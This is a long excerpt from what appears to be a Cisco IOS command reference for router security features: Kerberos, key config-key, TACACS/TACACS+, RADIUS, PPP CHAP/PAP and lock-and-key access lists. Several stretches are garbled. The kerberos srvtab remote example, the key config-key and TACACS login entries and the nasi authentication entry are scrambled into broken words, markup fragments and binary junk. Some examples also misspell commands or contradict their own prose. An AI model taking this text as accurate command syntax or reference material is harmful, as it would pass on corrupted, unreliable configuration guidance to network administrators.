[12.4.6] kerberos server

Use the kerberos server global configuration command to specify the location of the Kerberos server for a given Kerberos realm. Use the no form of this command to remove a Kerberos server for a specified Kerberos realm.

kerberos server kerberos-realm {hostname | ip-address} [port-number]

no kerberos server kerberos-realm {hostname | ip-address}

Syntax Description

kerberos-realm Name of the Kerberos realm. A Kerberos realm consists of users, hosts, and network services that are registered to a Kerberos server. The Kerberos realm must be in uppercase letters.

hostname Name of the host functioning as a Kerberos server for the specified Kerberos realm (translated into an IP address at the time of entry).

ip-address IP address of the host functioning as a Kerberos server for the specified Kerberos realm.

port-number (Optional) Port that the KDC/TGS monitors (defaults to 88).

Default

Disabled

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

Example

The following example specifies 126.38.47.66 as the Kerberos server for the Kerberos realm MURUGA.COM:

kerberos server MURUGA.COM 126.38.47.66

Related Commands

kerberos local-realm

kerberos realm

kerberos srvtab entry

kerberos srvtab remote

[12.4.7] kerberos srvtab entry

Use the kerberos srvtab remote global configuration command (not kerberos srvtab entry) to retrieve a SRVTAB file from a remoe host and automatically generate a Kerberos SRVTAB entry configuration. (The Kerberos SRVTAB entry is the router's locally stored SRVTAB.) Use the no form of this command to remove a SRVTAB entry from the router's configuration.

kerberos srvtab entry kerberos-principle principle-type timestamp key-version number

key-type key-length encrypted-keytab

no kerberos srvtab entry kerberos-principle principle-type

Syntax Description

kerberos-principle A service on the router.

principle-type Version of the Kerberos SRVTAB.

timestamp Number representing the date and time the SRVTAB entry was created.

key-version number Version of the encryption key format.

key-type Type of encryption used.

key-length Length, in bytes, of the encryption key.

encrypted-keytab Secret key the router shares with the KDC. It is encrypted with the private Data Encryption Standard (DES) key (if available) when you write out your configuration.

Command Mode

Global configuration.

Usage Guidelines

This command first appeared in Cisco IOS Release 11.2.

When you use the kerberos srvtab remote command to copy the SRVTAB file from a remote host (generally the KDC), it parses the information in this file and stores it in the router's running configuration in the

kerberos srvtab entry

format. The key for each SRVTAB entry is encrypted with a private DES key if one is defined on the router. To ensure that the SRVTAB is available (that is, that it does not need to be acquired from the KDC) when you reboot the router, use the write memory router configuration command to write the router's running configuration to NVRAM.

If you reload a configuration, with a SRVTAB encrypted with a private DES key, on to a router that does not have a private DES key defined, the router displays a message informing you that the SRVTAB entry has been corrupted, and discards the entry.

If you change the private DES key and reload an old version of the router's configuration that contains SRVTAB entries encrypted with the old private DES keys, the router will restore your Kerberos SRVTAB entries, but the SRVTAB keys will be corrupted. In this case, you must delete your old Kerberos SRVTAB entries and reload your Kerberos SRVTABs on to the router using the kerberos srvtab remote command.

Although you can configure kerberos srvtab entry on the router manually, generally you would not do this because the keytab is encrypted automatically by the router when you copy the SRVTAB using the kerberos srvtab remote command.

Example

In the following example, host/new-router.loki.com@LOKI.COM is the host, 0 is the type, 817680774 is the timestamp, 1 is the version of the key, 1 indicates the DES is the encryption type, 8 is the number of bytes, and .cCN.YoU.okK is the encrypted key:

kerberos srvtab entry host/new-router.loki.com@LOKI.COM 0 817680774 1 1 8 .cCN.YoU.okK

Related Commands

kerberos srvtab remote

key config-key

[12.4.8] kerberos srvtab remote

Use the kerberos srvtab remote configuration command to retrieve a krb5 SRVTAB file from the specified host.

kerberos srvtab remote {hostname | ip-address} {filename}

Syntax Description

hostname Machine with the Kerberos SRVTAB file.

ip-address IP address of the machine with the Kerberos SRVTAB file.

filename Name of the SRVTAB file.

Command Mode

Configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.2.

When you use the kerberos srvtab remote command to copy the SRVTAB file from the remote host (generally the KDC), it parses the information in this file and stores it in the router's running configuration in the

kerberos srvtab entry

tit wrrye B>moon <>E>heB>om>Tnd cn mae illthinfoexowplg coamese hepiar the Sesfiin roniducg t. bsckecocitoo. bm to a roucoci

kerbtaosrervteb ucmote bucket.cisco.com scooter.vtab

Related Commands

kerberos srvtab entry

key config-key

[12.4co] igy eynf)`-key

Use the keyglobal configuration command to define a private DES key for the router. Use the no form of teld e dpretata Daiv Ee rytaioncStptdan (anS)rdeyDEor khe fou tr. r/PteDI <,B>

key configring

Syntax Description

string&#></Pfa/Bt

><-kNo dESiney. efP>ed.

Command Mode

Gion.

Usage Guidelines

This command first appeared in Cisco IOS Release 11.2.

This commais def the router a private DES key that will not ill he router configuration. This private DES key can be used to DES-etorypt certain parts of the router's configuration.

mpB>Tsebb ri tte pESvaey DD key on the router: a<>R> srbtaosenrvy b P>try kerberos srvtab remote

acino B>nf>Turcoyoig re teurtoouter AC uS TerACutusft authentication, use the login configuration command. Use the no form of this command to disable TACACS user authenticution for a line.

logino P>gi>ntalocsn B>ca/P

<><x >SsctaptDenmais hom nnd`bas no argumentwordB> <>D>

Command Mode

Line configurcoion

Usage Guidelines

This coart ipeCiedo n S scleIOe Re.0asan>Yse cAC uS TcuACtysef riu iveyoonhagu cd figured a TACAr anveyo chama a comtrnd `ontrol languaghat allows you to use TACACS security. For information about using files provided by Cisco Systems to modify CCL tcrsutsoro TAppCSt seCAau uenr authenticatiurCog igplinalApReeTtek ccmos" Ahaeser chaptesI>><>Ttes /B>Thid connan bcausot we h edA/ith AAA/TACACS+. UcathontiB>tion command instead. >

In the following example exanes 1 througTAd CSr seCAau uenr cathonti

line tacacs

[12.5.1] nasi authenticationtic>T hesiicutiont/Batlin< c> fineraononguomtion cUsmath. no form of the command toefault, as specified by the aaa authentication nasi command.

nasi authasi cation default | list-name{on>d/Bamli/I-n <>}IR/PB>/D>S>n

ul9;/Bes&#heUsef tlt disaucr list created authentication nasi command.

list-name Uses the list created with the c&#maP>fa>

des the sef wlth ete it>ath and><MomminB>

Line ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þØ‚è¬‚è €‚è \‚è0‚è‚èÜè°èxèPèèà€è¸€èx¨€èy˜€èzˆ€èü„€èÿt€è(¢èX¢èp¢è@¢èconfiguration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

This command is a per-line command used with AAA authentication that specifies the name of a list of TACACS+ authentication methods to try at login. If no list is specified, the default list is used, even if it is specified in the command line. (You create defaults and lists with the aaa authentication nasi command.) Entering the no form of this command has the same effect as entering the command with the default argument.

Caution If you use a list-name value that was not configured with the aaa authentication nasi command, you will disable login on this line.

Before issuing this command, create a list of authentication processes by using the aaa authentication nasi global configuration command.

Examples

The following example specifies that the default AAA authentication be used on line 4:

line 4

nasi authentication default

The following example specifies that the AAA authentication list called list1 be used on line 7:

line 7

nasi authentication list1

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

aaa authentication nasi

ipx nasi-server enable †

show ipx nasi connections †

show ipx spx-protocol †

[12.5.2] ppp authentication

To enable Challenge Handshake Authentication Protocol (CHAP) or Password Authentication Protocol (PAP) or both and to specify the order in which CHAP and PAP authentication are selected on the interface, use the ppp authentication interface configuration command. Use the no form of the command to disable this authentication.

ppp authentication {chap | chap pap | pap chap | pap } [if-needed] [list-name | default]

[callin]

no ppp authentication

Syntax Description

chap Enables CHAP on a serial interface.

pap Enables PAP on a serial interface.

chap pap Enables both CHAP and PAP, and performs CHAP authentication before PAP.

pap chap Enables both CHAP and PAP, and performs PAP authentication before CHAP.

if-needed (Optional) Used with TACACS and extended TACACS. Does not perform CHAP or PAP authentication if the user has already provided authentication. This option is available only on asychronous interfaces.

list-name (Optional) Used with AAA/TACACS+. Specifies the name of a list of TACACS+ methods of authentication to use. If no list name is specified, the system uses the default. The list is created with the aaa authentication ppp command.

default The name of the method list is created with the aaa authentication ppp command.

callin Specifies authentication on incoming (received) calls only.

Caution If you use a list-name value that was not configured with the aaa authentication ppp command, you will disable PPP on this interface.

Default

PPP authentication is not enabled.

Command Mode

Interface configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

When you enable CHAP or PAP Authentication, or both, the local router requires the remote device to prove its identity before allowing data traffic to flow. PAP Authentication requires the remote device to send a name and password, which is checked against a matching entry in the local username database or in the remote TACACS/TACACS+ database. CHAP Authentication sends a Challenge to the remote device. The remote device encrypts the challenge value with a shared secret and returns the encrypted value and its name to the local Router in a Response message. The local router attempts to match the remote device's name with an associated secret stored in the local username or remote TACACS/TACACS+ database; it uses the stored secret to encrypt the original challenge and verify that the encrypted values match.

You can enable PAP or CHAP, or both, in either order. If you enable both methods, the first method specified is requested during link negotiation. If the peer suggests using the second method, or refuses the first method, the second method is tried. Some remote devices support only CHAP, and some support only PAP. Base the order in which you specify methods on the remote device's ability to correctly negotiate the appropriate method, and on the level of data line security you require. PAP usernames and passwords are sent as cleartext strings, which can be intercepted and reused. CHAP has eliminated most of the known security holes.

Enabling or disabling PPP authentication does not affect the local router's willingness to authenticate itself to the remote device.

If you are using autoselect on a TTY line, you probably want to use the ppp authentication command to turn on PPP authentication for the corresponding interface.

Example

The following example enables CHAP on asynchronous interface 4 and uses the authentication list MIS-access:

interface async 4

encapsulation ppp

ppp authentication chap MIS-access

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

aaa authentication ppp

aaa new-model

autoselect †

encapsulation ppp †

ppp use-tacacs

username †

[12.5.3] ppp chap hostname

Use the ppp chap hostname interface configuration command to create a pool of dialup routers that all appear to be the same host when authenticating with CHAP. To disable this function, use the no form of the command.

ppp chap hostname hostname

no ppp chap hostname hostname

Syntax Description

hostname The name sent in the CHAP challenge.

Default

Disabled. The router name is sent in any CHAP challenges.

Command Mode

Interface configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.2.

Currently, a router dialing a pool of access routers requires a username entry for each possible router in the pool because each router challenges with its hostname. If a router is added to the dialup rotary pool, all connecting routers must be updated. The ppp chap hostname command allows you to specify a common alias for all routers in a rotary group to use so that only one username must be configured on the dialing routers.

This command is normally used with local CHAP authentication (when the router authenticates to the peer), but it can also be used for remote CHAP authentication.

Example

The commands in the following example identify the dialer interface 0 as the dialer rotary group leader and specifies ppp as the method of encapsulation used by all member interfaces. CHAP authentication is used on received calls only. The username ISPCorp will be sent in all CHAP challenges and responses.

interface dialer 0

encapsulation ppp

ppp authentication chap callin

ppp chap hostnmae ISPCorp

Related Commands

aaa authentication ppp

ppp authentication

ppp chap password

ppp pap

[12.5.4] ppp chap password

Use the ppp chap password interface configuration command to enable a router calling a collection of routers that do not support this command (such as routers running older Cisco IOS software images) to configure a common CHAP secret password to use in response to challenges from an unknown peer. To disable this function, use the no form of this command.

ppp chap password secret

no chap password secret

Syntax Description

secret The secret used to compute the response value for any CHAP challenge from an unknown peer.

Default

Disabled.

Command Mode

Interface configuration.

Usage Guidelines

This command first appeared in Cisco IOS Release 11.2.

This command allows you to replace several username and password configuration commands with a single copy of this command on any dialer interface or asynchronous group interface.

This command is used for remote CHAP authentication only (when routers authenticate to the peer) and does not affect local CHAP authentication.

Example

The commands in the following example specify Integrated Services Digital Network (ISDN) Basic Rate Interface (BRI) number 0. The method of encapsulation on the interface is PPP. If a CHAP challenge is received from a peer whose name is not found in the global list of usernames, the encrypted secret 7 1267234591 is decrypted and used to create a CHAP response value.

interface bri 0

encapsulation ppp

ppp chap password 7 1234567891

Related Commands

aaa authentication ppp

ppp authentication

ppp chap hostname

ppp pap

[12.5.5] ppp pap sent-username

To reenable remote PAP support for an interface and use the sent-username and password in the PAP authentication request packet to the peer, use the ppp pap sent-username interface configuration command. Use the no form of this command to disable remote PAP support.

ppp pap sent-username username password password

no ppp pap sent-username

Syntax Description

username Username sent in the PAP authentication request.

password Password sent in the PAP authentication request.

password Must contain from 1 to 25 uppercase and lowercase alphanumeric characters.

Default

Remote PAP support disabled.

Command Mode

You must configure this command for each interface.

Usage Guidelines

This command first appeared in Cisco IOS Release 11.2.

Use this command to reenable remote PAP support (for example to respond to the peer's request to authenticate with PAP) and to specify the parameters to be used when sending the PAP Authentication Request.

This is a per-interface command.

Example

The commands in the following example identify dialer interface 0 as the dialer rotary group leader and specify PPP as the method of encapsulation used by the interface. Authentication is by CHAP or PAP on received calls only. ISPCor is the username sent to the peer if the peer requires the router to authenticate with PAP.

interface dialer0

encapsulation ppp

ppp authentication chap pap callin

ppp chap hostname ISPCor

ppp pap sent username ISPCorp password 7 fjhfeu

ppp pap sent-username ISPCorp password 7 1123659238

Related Commands

aaa authentication ppp

ppp authentication

ppp chap hostname

ppp chap password

ppp use-tacacs

[12.5.6] ppp use-tacacs

To enable TACACS for PPP authentication, use the ppp use-tacacs interface configuration command. Use the no form of the command to disable TACACS for PPP authentication.

ppp use-tacacs [single-line]

no ppp use-tacacs

Note This command is not used in AAA/TACACS+. It has been replaced with the aaa authentication ppp command.

Syntax Description

single-line (Optional) Accept the username and password in the username field. This option applies only when using CHAP authentication.

Default

TACACS is not used for PPP authentication.

Command Mode

Interface configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.3.

This is a per-interface command. Use this command only when you have set up an extended TACACS server.

When CHAP authentication is being used, the ppp use-tacacs command with the single-line option specifies that if a username and password are specified in the username, separated by an asterisk (*), a standard TACACS login query is performed using that username and password. If the username does not contain an asterisk, then normal CHAP authentication is performed.

This feature is useful when integrating TACACS with other authentication systems that require a cleartext version of the user's password. Such systems include one-time password systems, token card systems, and Kerberos.

Caution Normal CHAP authentications prevent the cleartext password from being transmitted over the link. When you use the single-line option, passwords cross the link as cleartext.

If the username and password are contained in the CHAP password, the CHAP secret is not used by the Cisco IOS software. Because most PPP clients require that a secret be specified, you can use any arbitrary string, and the Cisco IOS software ignores it.

Examples

In the following example, asynchronous serial interface 1 is configured to use TACACS for CHAP authentication:

interface async 1

ppp authentication chap

ppp use-tacacs

In the following example, asynchronous serial interface 1 is configured to use TACACS for PAP authentication:

interface async 1

ppp authentication pap

ppp use-tacacs

Related Commands

ppp authentication

tacacs-server extended

tacacs-server host

[12.5.7] radius-server dead-time

To improve RADIUS response times when some servers might be unavailable, use the radius-server dead-time global configuration command to cause the unavailable servers to be skipped immediately. Use the no form of this command to set dead-time to 0.

radius-server dead-time minutes

no radius-server dead-time

Syntax Description

minutes Length of time a RADIUS server is skipped over by transaction requests, up to a maximum of 1440 minutes (24 hours).

Default

Dead time is set to 0.

Command Mode

Global configuration

Usage Guidelines

Use this command to cause the Cisco IOS to mark as "dead" RADIUS servers that fail to respond to authentication requests, thus avoiding the wait for the request to time out before trying the next configured server. A RADIUS server marked as "dead" is skipped by additional requests for the duration of minutes or unless there are no servers not marked "dead."

Example

The following example specifies 5 minutes dead-time for RADIUS servers that fail to respond to authentication requests.

radius-server dead-time 5

Related Commands

radius-server host

radius-server retransmit

radius-server timeout

[12.5.8] radius-server host

To specify a RADIUS server host, use the radius-server host global configuration command. Use the no form of this command to delete the specified RADIUS host.

radius-server host {hostname | ip-address} [auth-port port-number] [acct-port port-number]

no radius-server host {hostname | ip-address}

Syntax Description

hostname DNS name of the RADIUS server host.

ip-address IP address of the RADIUS server host.

auth-port Specifies the UDP destination port for authentication requests.

port-number Port number for authentication requests; the host is not used for authentication if set to 0.

acct-port Specifies the UDP destination port for accounting requests.

port-number Port number for accounting requests; the host is not used for accounting if set to 0.

Default

No RADIUS host is specified.

Command Mode

Global configuration

Usage Guidelines

You can use multiple radius-server host commands to specify multiple hosts. The software searches for hosts in the order you specify them.

Example

The following example specifies host1 as the RADIUS server and uses default ports for both accounting and authentication.

radius-server host host1.company.com

The following example specifies port 12 as the destination port for authentication requests and port 16 as the destination port for accounting requests on a RADIUS host named host1:

radius-server host host1.company.com auth-port 12 acct-port 16

Note that because entering a line resets all the port numbers, you must specify a host and configure accounting and authentication ports on a single line.

To use separate servers for accounting and authentication, use the zero port value as appropriate. The following example specifies that RADIUS server host1 be used for accounting but not for authentication, and that RADIUS server host2 be used for authentication but not for accounting:

radius-server host host1.company.com auth-port 0

radius-server host host2.company.com acct-port 0

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

aaa accounting †

aaa authentication

aaa authorization

ppp†

ppp authentication

slip †

tacacs-server

username †

[12.5.9] radius-server key

Use the radius-server key global configuration command to set the authentication and encryption key for all RADIUS communications between the router and the RADIUS daemon. Use the no form of the command to disable the key.

radius-server key {string}

no radius-server key

Syntax Description

string (Optional) The key used to set authentication and encryption.

This key must match the encryption used on the RADIUS daemon.

Default

Disabled

Command Mode

Global Configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

After enabling AAA authentication with the aaa new-model command, you must set the authentication and encryption key using the radius-server key command.

Note Specify a RADIUS key after you issue the aaa newmodel command.

The key entered must match the key used on the RADIUS daemon. All leading spaces are ignored, but spaces within and at the end of the key are used. If you use spaces in your key, do not enclose the key in quotation marks unless the quotation marks themselves are part of the key.

Example

The following example illustrates how to set the authentication and encryption key to "dare to go":

radius-server key dare to go

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

ppp †

ppp authentication

slip †

tacacs-server

username †

[12.6.0] radius-server retransmit

To specify the number of times the Cisco IOS software searches the list of RADIUS server hosts before giving up, use the radius-server retransmit global configuration command. Use the no form of this command to disable retransmission.

radius-server retransmit retries

no radius-server retransmit

Syntax Description

retries Maximum number of retransmission attempts.

Default

Three retries

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

The Cisco IOS software tries all servers, allowing each one to time out before increasing the retransmit count.

Example

The following example specifies a retransmit counter value of five times:

radius-server retransmit 5

radius-server timeout

To set the interval a router waits for a server host to reply, use the radius-server timeout global configuration command. Use the no form of this command to restore the default.

radius-server timeout seconds

no radius-server timeout

Syntax Description

seconds Integer that specifies the timeout interval in seconds.

Default

5 seconds

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

Example

The following example changes the interval timer to 10 seconds:

radius-server timeout 10

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

ppp †

ppp authentication†

slip †

tacacs-server †

username †

[12.6.1] show kerberos creds

Use the show kerberos creds EXEC command to display the contents of your credentials cache.

show kerberos creds

Syntax Description

This command has no keywords or arguments.

Command Mode

EXEC

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

The show kerberos creds command is equivalent to the UNIX klist command.

When users authenticate themselves with Kerberos, they are issued an authentication ticket called a credential. The credential is stored in a credential cache.

Sample Displays

In the following example, the entries in the credentials cache are displayed:

Router> show kerberos creds

Default Principal: chet@cisco.com

Valid Starting Expires Service Principal

18-Dec-1995 16:21:07 19-Dec-1995 00:22:24 krbtgt/CISCO.COM@CISCO.COM

In the following example, output is returned that acknowledges that credentials do not exist in the credentials cache:

Router> show kerberos creds

No Kerberos credentials

Related Command

clear kerberos creds

[12.6.2] show privilege

To display your current level of privilege, use the show privilege EXEC command.

show privilege

Syntax Description

This command has no arguments or keywords.

Command Mode

EXEC

Usage Guidelines

This command first appeared in Cisco IOS Release 10.3.

Sample Display

The following is sample output from the show privilege command. The current privilege level is 15.

Router# show privilege

Current privilege level is 15

Related Command

A dagger (†) indicates that the command is documented outside this chapter.

enable password †

[12.6.3] tacacs-server key

Use the tacacs-server key global configuration command to set the authentication encryption key used for all TACACS+ communications between the access server and the TACACS+ daemon. Use the no form of the command to disable the key.

tacacs-server key key

no tacacs-server key [key]

Syntax Description

key Key used to set authentication and encryption. This key must match the key used on the TACACS+ daemon.

Command Mode

Global Configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

After enabling AAA with the aaa new-model command, you must set the authentication and encryption key using the tacacs-server key command.

The key entered must match the key used on the TACACS+ daemon. All leading spaces are ignored; spaces within and at the end of the key are not. If you use spaces in your key, do not enclose the key in quotation marks unless the quotation marks themselves are part of the key.

Example

The following example illustrates how to set the authentication and encryption key to "dare to go":

tacacs-server key dare to go

Related Commands

aaa new-model

tacacs-server host

[12.6.4] tacacs-server login-timeout

To specify how long the system will wait for login input (such as username and password) before timing out, use the tacacs-server login-timeout global configuration command. Use the no form of this command to restore the default value of 30 seconds.

tacacs-server login-timeout seconds

no tacacs-server login-timeout seconds

Syntax Description

seconds Integer that determines the number of seconds the system will wait for login input before timing out. Available settings are from 1 to 300 seconds.

Default

The default login timeout value is 30 seconds.

Command Mode

Global configuration

Usage Guidelines

With aaa new-model enabled, the default login timeout value is 30 seconds. The tacacs-server login-timeout command lets you change this timeout value from 1 to 300 seconds. To restore the default login timeout value of 30 seconds, use the no tacacs-server login-timeout command.

Example

The following example changes the login timeout value to 60 seconds:

tacacs login 60

[12.6.5] tacacs-server authenticate

To configure the Cisco IOS software to indicate whether a user can perform an attempted action under TACACS and extended TACACS, use the tacacs-server authenticate global configuration command.

tacacs-server authenticate {connection [always]enable | slip [always] [access-lists]}

Syntax Description

connection Configures a required response when a user makes a TCP connection.

enable Configures a required response when a user enters the enable command.

slip Configures a required response when a user starts a SLIP or PPP session.

always (Optional) Performs authentication even when a user is not logged in. This option only applies to the slip keyword.

access-lists (Optional) Requests and installs access lists. This option only applies to the slip keyword.

Command Mode

Global configuration

Usage Guidelines

The tacacs-server authenticate [connection | enable] command first appeared in Cisco IOS Release 10.0. The tacacs-server authenticate {connection [always]enable | slip [always] [access-lists]} command first appeared in Cisco IOS Release 10.3.

Enter one of the keywords to specify the action (when a user enters enable mode, for example).

Before you use the tacacs-server authenticate command, you must enable the tacacs-server extended command.

Note This command is not used in AAA/TACACS+. It has been replaced by the aaa authorization command.

Example

The following example configures TACACS logins that authenticate users to use Telnet or rlogin:

tacacs-server authenticate connect

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

enable secret †

enable use-tacacs

[12.6.6] tacacs-server directed-request

To send only a username to a specified server when a direct request is issued, use the tacacs-server directed-request global configuration command. Use the no form of this command to disable the direct-request feature.

tacacs-server directed-request

no tacacs-server directed-request

Syntax Description

This command has no arguments or keywords.

Default

Enabled

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

This command sends only the portion of the username before the "@" symbol to the host specified after the "@" symbol. In other words, with the directed-request feature enabled, you can direct a request to any of the configured servers, and only the username is sent to the specified server.

Disabling tacacs-server directed-request causes the whole string, both before and after the "@" symbol, to be sent to the default tacacs server. When the directed-request feature is disabled, the router queries the list of servers, starting with the first one in the list, sending the whole string, and accepting the first response that it gets from the server. The tacacs-server directed-request command is useful for sites that have developed their own TACACS server software that parses the whole string and makes decisions based on it.

With tacacs-server directed-request enabled, only configured TACACS servers can be specified by the user after the "@" symbol. If the host name specified by the user does not match the IP address of a TACACS server configured by the administrator, the user input is rejected.

Use no tacacs-server directed-request to disable the ability of the user to choose between configured TACACS servers and to cause the entire string to be passed to the default server.

Example

The following example enables tacacs-server directed-request so that the entire user input is passed to the default TACACS server:

no tacacs-server directed-request

tacacs-server extended

To enable an extended TACACS mode, use the tacacs-server extended global configuration command. Use the no form of this command to disable the mode.

tacacs-server extended

no tacacs-server extended

Syntax Description

This command has no arguments or keywords.

Default

Disabled

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

This command initializes extended TACACS. To initialize AAA/TACACS+, use the aaa new-model command.

Example

The following example enables extended TACACS mode:

tacacs-server extended

tacacs-server host

To specify a TACACS host, use the tacacs-server host global configuration command. Use the no form of this command to delete the specified name or address.

tacacs-server host hostname [single-connection] [port integer] [timeout integer] [key string]

no tacacs-server host hostname

Syntax Description

hostname Name or IP address of the host.

single-connection Specify that the router maintain a single open connection for confirmation from a AAA/TACACS+ server (CiscoSecure Release 1.0.1 or later). This command contains no autodetect and fails if the specified host is not running a CiscoSecure daemon.

port Specify a server port number.

integer Port number of the server (in the range 1 to 10,000).

timeout Specify a timeout value. This overrides the global timeout value set with the tacacs-server timeout command for this server only.

integer Integer value, in seconds, of the timeout interval.

key Specify an authentication and encryption key. This must match the key used by the TACACS+ daemon. Specifying this key overrides the key set by the global command tacacs-server key for this server only.

string Character string specifying authentication and encryption key.

Default

No TACACS host is specified.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

You can use multiple tacacs-server host commands to specify additional hosts. The Cisco IOS software searches for hosts in the order in which you specify them. Use the single-connection, port, timeout, and key options only when running a AAA/TACACS+ server.

Because some of the parameters of the tacacs-server host command override global settings made by the tacacs-server timeout and tacacs-server key commands, you can use this command to enhance security on your network by uniquely configuring individual routers.

Examples

The following example specifies a TACACS host named Sea_Change:

tacacs-server host Sea_Change

The following example specifies that, for AAA confirmation, the router consult the CiscoSecure TACACS+ host named Sea_Cure on port number 51. The timeout value for requests on this connection is 3 seconds; the encryption key is a_secret.

tacacs-server host Sea_Cure single-connection port 51 timeout 3 key a_secret

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

ppp †

slip †

tacacs-server key

tacacs-server timeout

[12.6.7] tacacs-server key

tacacs-server key key

no tacacs-server key [key]

Syntax Description

key Key used to set authentication and encryption. This key must match the key used on the TACACS+ daemon.

Command Mode

Global Configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

After enabling AAA with the aaa new-model command, you must set the authentication and encryption key using the tacacs-server key command.

Example

The following example illustrates how to set the authentication and encryption key to "dare to go":

tacacs-server key dare to go

Related Commands

aaa new-model

tacacs-server host

[12.6.8] tacacs-server last-resort

To cause the network access server to request the privileged password as verification, or to allow successful login without further input from the user, use the tacacs-server last-resort global configuration command. Use the no tacacs-server last-resort command to restore the system to the default behavior.

tacacs-server last-resort {password | succeed}

no tacacs-server last-resort {password | succeed}

Syntax Description

password Allows the user to access the EXEC command mode by entering the password set by the enable command.

succeed Allows the user to access the EXEC command mode without further question.

Default

If, when running the TACACS server, the TACACS server does not respond, the default action is to deny the request.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

Use the tacacs-server last-resort command to be sure that login can occur; for example, when a systems administrator needs to log in to troubleshoot TACACS servers that might be down.

Note This command is not used in AAA/TACACS+.

Example

The following example forces successful login:

tacacs-server last-resort succeed

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

enable password †

[12.6.9] tacacs-server notify

Use the tacacs-server notify global configuration command to cause a message to be transmitted to the TACACS server, with retransmission being performed by a background process for up to 5 minutes. Use the no form of this command to disable notification.

tacacs-server notify {connection [always] | enable | logout [always] | slip [always]}

no tacacs-server notify

Syntax Description

connection Specifies that a message be transmitted when a user makes a TCP connection.

always (Optional) Sends a message even when a user is not logged in. This option applies only to SLIP or PPP sessions and can be used with the logout or slip keywords.

enable Specifies that a message be transmitted when a user enters the enable command.

logout Specifies that a message be transmitted when a user logs out.

slip Specifies that a message be transmitted when a user starts a SLIP or PPP session.

Default

No message is transmitted to the TACACS server.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0. The always and slip commands first appeared in Cisco IOS Release 11.0.

The terminal user receives an immediate response, allowing access to the feature specified. Enter one of the keywords to specify notification of the TACACS server upon receipt of the corresponding action (when user logs out, for example).

Note This command is not used in AAA/TACACS+. It has been replaced by the

aaa accounting suite of commands.

Example

The following example sets up notification of the TACACS server when a user logs out:

tacacs-server notify logout

[12.7.0] tacacs-server optional-passwords

To specify that the first TACACS request to a TACACS server be made without password verification, use the tacacs-server optional-passwords global configuration command. Use the no form of this command to restore the default.

tacacs-server optional-passwords

no tacacs-server optional-passwords

Syntax Description

This command has no arguments or keywords.

Default

Disabled

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

When the user enters in the login name, the login request is transmitted with the name and a zero-length password. If accepted, the login procedure completes. If the TACACS server refuses this request, the server software prompts for a password and tries again when the user supplies a password. The TACACS server must support authentication for users without passwords to make use of this feature. This feature supports all TACACS requests---login, SLIP, enable, and so on.

Note This command is not used by AAA/TACACS+.

Example

The following example configures the first login to not require TACACS verification:

tacacs-server optional-passwords

[12.7.1] tacacs-server retransmit

To specify the number of times the Cisco IOS software searches the list of TACACS server hosts before giving up, use the tacacs-server retransmit global configuration command. Use the no form of this command to disable retransmission.

tacacs-server retransmit retries

no tacacs-server retransmit

Syntax Description

retries Integer that specifies the retransmit count.

Default

Two retries

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

The Cisco IOS software will try all servers, allowing each one to time out before increasing the retransmit count.

Example

The following example specifies a retransmit counter value of five times:

tacacs-server retransmit 5

[12.7.2] tacacs-server timeout

To set the interval that the server waits for a server host to reply, use the tacacs-server timeout global configuration command. Use the no form of this command to restore the default.

tacacs-server timeout seconds

no tacacs-server timeout

Syntax Description

seconds Integer that specifies the timeout interval in seconds (between 1 and 300).

Default

5 seconds

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

Example

The following example changes the interval timer to 10 seconds:

tacacs-server timeout 10

Related Command

tacacs-server host

[12.7.3] Traffic Filter Commands

This chapter describes the commands used to configure Lock-and-key security (IP only).

Other traffic filter commands are protocol-specific, and are therefore described in the appropriate protocol-specific chapters in the Cisco IOS command references. You should refer to these protocol-specific chapters to find detailed information about traffic filter commands for each protocol. (Many of these protocols refer to the filters as "access lists.")

Specific information about configuring traffic filters (access lists) for these protocols can be found in protocol-specific chapters in the Cisco IOS configuration guides. General guidelines for using access lists can be found in the "Configuring Traffic Filters" chapter of the Security Configuration Guide.

Lock-and-key security is implemented with extended IP dynamic access lists. Lock-and-key security is available only for IP traffic, but provides more security functions than traditional static traffic filters.

[12.7.4] access-enable

To enable the router to create a temporary access list entry in a dynamic access list, use the access-enable EXEC command.

access-enable [host] [timeout minutes]

Syntax Description

host (Optional) Tells the software to enable access only for the host from which the Telnet session originated. If not specified, the software allows all hosts on the defined network to gain access. The dynamic access list contains the network mask to use for enabling the new network.

timeout minutes (Optional) Specifies an idle timeout for the temporary access list entry. If the access list entry is not accessed within this period, it is automatically deleted and requires the user to authenticate again. The default is for the entries to remain permanently. We recommend that this value equal the idle timeout set for the WAN connection.

Command Mode

EXEC

Usage Guidelines

